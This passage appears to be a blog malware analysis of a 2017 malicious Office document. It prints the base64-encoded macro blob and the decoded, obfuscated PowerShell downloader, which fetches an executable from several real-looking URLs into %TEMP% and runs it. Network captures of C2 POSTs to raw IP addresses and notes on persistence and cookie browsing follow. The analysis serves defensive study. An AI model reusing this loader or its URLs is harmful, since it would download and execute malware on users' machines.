G0ALwBKAGwAVAAnACwAJwByAGUAYgAuAGMAbwBtAC8AUwBPACcALAAnAHkAJwAsACcAaABvAGMAbwBtAHAAcgBvAC4AYwAnACwAJwB0AHAAOgAvAC8AbwBrAGkAZQAnACwAJwBoAEMAZwBHAE8ALwAsAGgAdAB0AHAAOgAvAC8AcQBkAGUAYwBpAHMAaQBvAG4AcwAuAGMAbwBtACcALAAnAGcAaABWAFMALwAsACcALAAnAHoALwAnACwAJwBtAGIAbwBjAGkAJwAsACcALwAvACcALAAnAC8AYwBhAHAAYQBjAGkAdABhAGMAaQAnACwAJwB0ACcALAAnAGgAJwAsACcAbgBhAC4AcABsAC8AaQAnACwAJwBvAG4ALwBiACcALAAnAGUAJwAsACcAdAB0AHAAOgAvAC8AdwBlACcALAAnAGEAJwAsACcAbwAnACwAJwByAG4AZQAnACwAJwBMAFQAJwAsACcATAByAHcAagAnACwAJwBNACcALAAnAHMAegBXAC8ALABoAHQAJwAsACcAQgByAGMASQBFAC8ALABoAHQAdABwADoALwAvAHYAJwAsACcALwAnACwAJwB0AHAAOgAnACwAJwBlAGkAbQAuAGMAJwAsACcAbwBtAC4AdQAnACwAJwByAGIAZQByAG4AaAAnACkALgAoACIAewAwAH0AewAxAH0AIgAtAGYAJwBTAHAAbABpACcALAAnAHQAJwApAC4ASQBuAHYAbwBrAGUAKAAnACwAJwApADsAJAB7AG4AYQBgAE0AZQB9ACAAPQAgACQAewBSAEEATgBEAGAATwBtAH0ALgAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACcAeAB0ACcALAAnAG4AZQAnACkALgBJAG4AdgBvAGsAZQAoADEALAAgADYANQA1ADMANgApADsAJAB7AFAAYQBgAFQASAB9ACAAPQAgACQAewBlAGAATgB2ADoAdABFAE0AUAB9ACAAKwAgACcAXAAnACAAKwAgACQAewBuAEEAYABtAEUAfQAgACsAIAAoACIAewAxAH0AewAwAH0AIgAtAGYAJwBlAHgAZQAnACwAJwAuACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAHsAdQBgAFIAbAB9ACAAaQBuACAAJAB7AFUAcgBgAGwAUwB9ACkAewB0AHIAeQB7ACQAewB3AEUAYgBgAEMAbABpAEUAYABOAHQAfQAuACgAIgB7ADIAfQB7ADAAfQB7ADMAfQB7ADEAfQAiACAALQBmACAAJwBsACcALAAnAEYAaQBsAGUAJwAsACcARABvAHcAbgAnACwAJwBvAGEAZAAnACkALgBJAG4AdgBvAGsAZQAoACQAewBVAGAAUgBMAH0ALgAoACIAewAwAH0AewAxAH0AIgAtAGYAJwBUACcALAAnAG8AUwB0AHIAaQBuAGcAJwApAC4ASQBuAHYAbwBrAGUAKAApACwAIAAkAHsAcABBAGAAVABIAH0AKQA7AC4AKAAiAHsAMAB9AHsAMQB9AHsAMgB9ACIALQBmACcAUwB0AGEAcgB0AC0AUAByACcALAAnAG8AYwBlACcALAAnAHMAcwAnACkAIAAkAHsAcABgAEEAdABIAH0AOwBiAHIAZQBhAGsAOwB9AGMAYQB0AGMAaAB7AC4AKAAiAHsAMAB9AHsAMgB9AHsAMQB9ACIAIAAtAGYAJwB3AHIAaQB0AGUALQBoACcALAAnAHMAdAAnACwAJwBvACcAKQAgACQAewBfAH0ALgAiAEUAeABjAEUAUAB0AGAAaQBgAE8AbgAiAC4AIgBtAEUAcwBTAGAAQQBHAGUAIgA7AH0AfQANAAoA
End Function

So the line above found within the comments field is nothing more than a long base64 encoded string that looks like this when decoded:

${w`sCR`IPT} = .("{1}{0}{2}" -f 'objec','new-','t') -ComObject ("{4}{0}{3}{2}{1}"-f'rip','Shell','.','t','WSc');
${WEBc`liE`NT} = .("{3}{2}{0}{1}"-f 'je','ct','ew-ob','n') ("{3}{2}{0}{4}{1}" -f 't','t','.Ne','System','.WebClien');
${RAn`d`Om} = .("{0}{2}{1}"-f'ne','-object','w') ("{1}{0}{2}"-f 'o','rand','m');
${u`RLS} = ("{0}{17}{20}{30}{28}{29}{3}{11}{15}{23}{21}{25}{16}{2}{7}{13}{12}{27}{10}{4}{19}{1}{24}{5}{9}{18}{14}{6}{26}{22}{8}" -f 'h','m/JlT','reb.com/SO','y','hocompro.c','tp://okie','hCgGO/,http://qdecisions.com','ghVS/,','z/','mboci','//','/capacitaci','t','h','na.pl/i','on/b','e','ttp://we','a','o','rne','LT','Lrwj','M','szW/,ht','BrcIE/,http://v','/','tp:','eim.c','om.u','rbernh').("{0}{1}"-f'Spli','t').Invoke(',');
${na`Me} = ${RAND`Om}.("{1}{0}" -f 'xt','ne').Invoke(1, 65536);
${Pa`TH} = ${e`Nv:tEMP} + '\' + ${nA`mE} + ("{1}{0}"-f'exe','.');foreach(${u`Rl} in ${Ur`lS}){try{${wEb`CliE`Nt}.("{2}{0}{3}{1}" -f 'l','File','Down','oad').Invoke(${U`RL}.("{0}{1}"-f'T','oString').Invoke(), ${pA`TH});.("{0}{1}{2}"-f'Start-Pr','oce','ss') ${p`AtH};break;}catch{.("{0}{2}{1}" -f'write-h','st','o') ${_}."ExcEPt`i`On"."mEsS`AGe";}}

The above encoded block may look odd, but it is another way of encoding a powershell command using base64 while also using the format operator (https://ss64.com/ps/syntax-f-operator.html). The ‘-f’ operator allows placeholders to be used in the powershell script and how to then place them into the script. For example:

"{1}{0}{2}" -f objec,new-,t --> 0 = objec | 1 = new- | 2 = t ==> new-object

So walking through the script knowing this, you get the following:

${wsCRIPT} = .(new-object) --ComObject (Wscript.Shell);
${WEBcliENT} = .(new-object) (System.Net.Webclient);
${RAndOm} = .(new-object) (random);
${uRLS} = ( = http://wernerbernheim.com.uy/capacitacion/bMLTBrcIE/ http://vereb.com/SOghVS/ http://hocompro.com/JlTszW/ http://okie
mbociana.pl/ihCgGO/ http://qdecisions.com/Lrwjz/).Split.Invoke(,);
${naMe} = ${RANDOm}.(next).Invoke(1, 65536);
${PaTH} = ${eNv:tEMP} + \ + ${nAmE} + (.exe);
	foreach(${uRl} in ${UrlS})
		{
			try {${wEbCliENt}.(FileDownload).Invoke(${URL}.("ToString).Invoke(), ${pATH});
			.("Start-Process) ${pAtH};break;}
			catch {.("write-host) ${_}."ExcEPtiOn"."mEsSAGe";}
		}

The faster way to decode the above script instead of doing it manually is to use Powersehll itself. In order to do this, take one of the lines above, for example the one for “${w`sCR`IPT}” and type the following at the Powershell prompt: “write-host ${w`sCR`IPT} = .(“{1}{0}{2}” -f ‘objec’,’new-‘,’t’) -ComObject (“{4}{0}{3}{2}{1}”-f’rip’,’Shell’,’.’,’t’,’WSc’);” minus the quotes as seen below:

Note: I didn’t know about the above method until I read @dvk01uk’s post. Thanks for the tip dvk01uk!

Analysis:
=========
From the network traffic perspective, once the maldoc is run, there is the initial call to the site ‘wernerbernheim[.]com[.]uy/capacitacion/bMLTBrcIE/’ to download the malicious binary:

GET /capacitacion/bMLTBrcIE/ HTTP/1.1
Host: wernerbernheim.com.uy
Connection: Keep-Alive

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Content-Type: application/octet-stream
Server: Microsoft-IIS/8.5
Content-Disposition: attachment; filename="GVhZFRnuDfWvPO.exe"
Content-Transfer-Encoding: binary
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
Date: Fri, 25 Aug 2017 11:54:24 GMT
Content-Length: 86016

MZ......................@.............................................	.!..L.!This program cannot be run in DOS mode.

$.........d=..

which is saved to the %TEMP% directory of the system. Next, from what I can piece together from the separate runs of the malware and the ensuing PCAPs, the malicious binary that was downloaded then starts calling out in the form of POST requests using both port 443 (not HTTPS though), and port 8080:

POST / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 62.39.95.185:443
Content-Length: 500
Connection: Keep-Alive
Cache-Control: no-cache

Q7.....b..).....s......O.....ty.
............I.Q*4s4..O!...jg......vt.>..s%G0n.......2.V......n..o%EJwI.7MT.f...QY-.k...U...!v..............cq..;.......LTA...84.Gkk.K....@....n...p
Vy......]OLE..O.~..1 ....6,.t.`.........Q*D..H($..` W....{............0.:.)........|.[.NEN.....{.[.VH$........."..`.7Vt.17.:1.......%
..N_..B...OH..
..X..o./...{.....).....l.t..W......Eb..l.e..g....n...2c......J..3........>Hv4...r.d.._h.......$.|.W4.$e.X.U*..GI3Sd.Y.4C.{..wXC.............9...[/.J.>4=..+....y....*C..v.

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 25 Aug 2017 11:56:30 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 132
Connection: keep-alive

.)I..,.....{_n..b...SMh..q).H......)KyC.P.8J.Z...zdm.g/]2.E..n
...:.Q.	.....=>~.....d..1..t..{.HEZ..{.C|...D...[.r.[7..PwQ...|.c..!.

-----

POST / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 104.236.252.178:8080
Content-Length: 516
Connection: Keep-Alive
Cache-Control: no-cache

..c..
. \..r.hm.........1.t.F.ee.~....E#1w....qD...{
	......
.......?j..~..}.....].d...,....j..
..:%H+X....cD./`<rb.....b...8....}........)!....9.G..a..dz..Y..~...dl.....v.....u.3-"....K$... ...".nT...az,Rt...@.._T8.@m..	..t-.....d...Ew.Vm.rX..<..T......Q...]...G./...5......G..k...C.&#ePi.e..#..|.fL|...].L.-..6.....E.wB....p..e)u....Zr)A_.\Y.K.,X..(........oGi.....FwE..j(..?..Y.&.	.
.HT..%y...6..IU.....od..T.T?..YZFL......]|o.YC*....s..*..8.R:.....[,.0.RZ<!:...k..2...Sp...[S...^...	.T0?r...3......7..8_...o.....

HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 28 Aug 2017 09:04:05 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 132
Connection: keep-alive

.)I..,.....{_n..b...SMh..q).H......)KyC.P.8J.Z...zdm.g/]2.E..n
...:.Q.	.....=>~.....d..1..t..{.HEZ..{.C|...D...[.r.[{.......<.>..e..

From the host perspective, this is pretty straight forward. The file “GVhZFRnuDfWvPO.exe” executes itself, and spawns another copy of itself in the same location. This instance of “GVhZFRnuDfWvPO.exe” then proceeds to perform a SetRenameInformationFile operation and creates the file “serviceprov.exe” which is the same file as “GVhZFRnuDfWvPO.exe” but now in a new location – C:\Users\%username%\AppData\Local\Microsoft\Windows. This initial instance proceeds to spawn another copy of itself and is the process that is responsible for the POST commands seen above in the PCAP.

Also looking into the ProcMon log, I can see that it is this process that is looking through different folders within my VM (ie: Windows History, cookies, etc…). Lastly we see that the process writes itself to the registry to establish persistence:

Leave a Reply

Your email address will not be published. Required fields are marked *